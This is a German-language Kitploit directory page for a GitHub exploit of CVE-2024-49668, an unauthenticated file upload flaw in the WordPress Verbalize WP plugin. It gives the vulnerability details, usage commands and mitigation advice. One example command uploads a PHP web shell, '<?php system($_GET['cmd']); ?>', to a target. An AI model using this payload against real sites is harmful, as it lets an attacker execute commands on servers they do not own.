Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-49668 — WordPress Verbalize WP Plugin <= 1.0 - Sicherheitslücke für beliebigen Datei-Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-49668
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2024-49668

CVE-2024-49668

WordPress Verbalize WP Plugin <= 1.0 - Sicherheitslücke für beliebigen Datei-Upload

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2024-49668: WordPress Verbalize WP Plugin Sicherheitslücke für willkürlichen Datei-Upload

📋 Übersicht

CVE-2024-49668 ist eine kritische Sicherheitslücke im WordPress Verbalize WP Plugin, Version 1.0 und darunter. Diese Sicherheitslücke ermöglicht es nicht authentifizierten Angreifern, beliebige Dateien, einschließlich Web-Shells, auf den Webserver hochzuladen. Das Problem entsteht durch unzureichende Eingabevalidierung und fehlende Dateitypbeschränkungen beim Datei-Upload.

Details

  • Veröffentlicht: 2024-10-23
  • Aktualisiert: 2024-10-23
  • Titel: WordPress Verbalize WP Plugin <= 1.0 - Sicherheitslücke für willkürlichen Datei-Upload
  • Beschreibung: Schwachstelle für uneingeschränkten Upload von Dateien mit gefährlichem Typ in Admin Verbalize WP. Es ermöglicht das Hochladen einer Web-Shell auf einen Webserver. Betroffen ist Verbalize WP von n/a bis einschließlich 1.0.
  • CWE: CWE-434: Uneingeschränkter Upload von Dateien mit gefährlichem Typ
  • CVSS-Score: 10.0 (Kritisch)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

🛠️ Exploit-Skript

Dieses Python-Skript nutzt die Schwachstelle CVE-2024-49668 aus, um eine Shell-Datei mithilfe des Verbalize WP Plugins auf die Ziel-Website hochzuladen.

Funktionen

  • Automatisierte Schwachstellenprüfung: Das Skript überprüft, ob die Zielseite verwundbar ist, indem es die Plugin-Version in der Datei readme.txt prüft.
  • Datei-Upload: Lädt eine PHP-Shell-Datei auf die Zielseite hoch.
  • Pfad-Extraktion: Extrahiert und zeigt den vollständigen Pfad zur hochgeladenen Shell-Datei an.

🧰 Voraussetzungen

  • Python 3.x
  • requests Bibliothek

Installieren Sie die erforderliche Bibliothek mit pip:

root@kitploit:~
pip install requests

🚀 Verwendung

root@kitploit:~
usage: 
CVE-2024-49668.py [-h] -u URL [-s SHELL]

Execute a POST request to a WordPress site.

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target URL
  -s, --shell SHELL  Shell code to upload

Beispiel

Standardmäßig lädt das Skript eine PHP-Shell hoch, die phpinfo() ausführt.

root@kitploit:~
python CVE-2024-49668.py -u http://target.com

Sie können auch einen benutzerdefinierten PHP-Shell-Code zum Hochladen angeben:

root@kitploit:~
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"

📄 Skript-Ausgabe

root@kitploit:~
The site is vulnerable. Exploiting version: 1.0. Uploading file...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi

📚 Zusätzliche Informationen

Auswirkungen der Schwachstelle

Die Schwachstelle CVE-2024-49668 ermöglicht es Angreifern, durch das Hochladen schädlicher Dateien die vollständige Kontrolle über den Zielserver zu erlangen. Die Ausnutzung dieser Schwachstelle kann schwerwiegende Folgen haben, darunter Datenlecks, unbefugter Zugriff und mögliche Verunstaltung der Website.

Best Practices zur Schadensbegrenzung

Um Ihre WordPress-Seite vor dieser Schwachstelle zu schützen, wird Folgendes empfohlen:

  • Aktualisieren Sie das Verbalize WP Plugin auf die neueste Version, die dieses Problem behebt.
  • Implementieren Sie strenge Validierungen für Datei-Uploads, um Dateitypen und -größen einzuschränken.
  • Überwachen Sie regelmäßig Ihre Serverprotokolle auf verdächtige Aktivitäten.

Rechtlicher Hinweis

Dieses Tool dient ausschließlich zu Bildungszwecken. Die unbefugte Verwendung dieses Tools gegen Websites ohne ausdrückliche Genehmigung des Eigentümers ist illegal. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.


Created on 2025-03-22 by Nxploited , Khaled alenazi

Tool herunterladen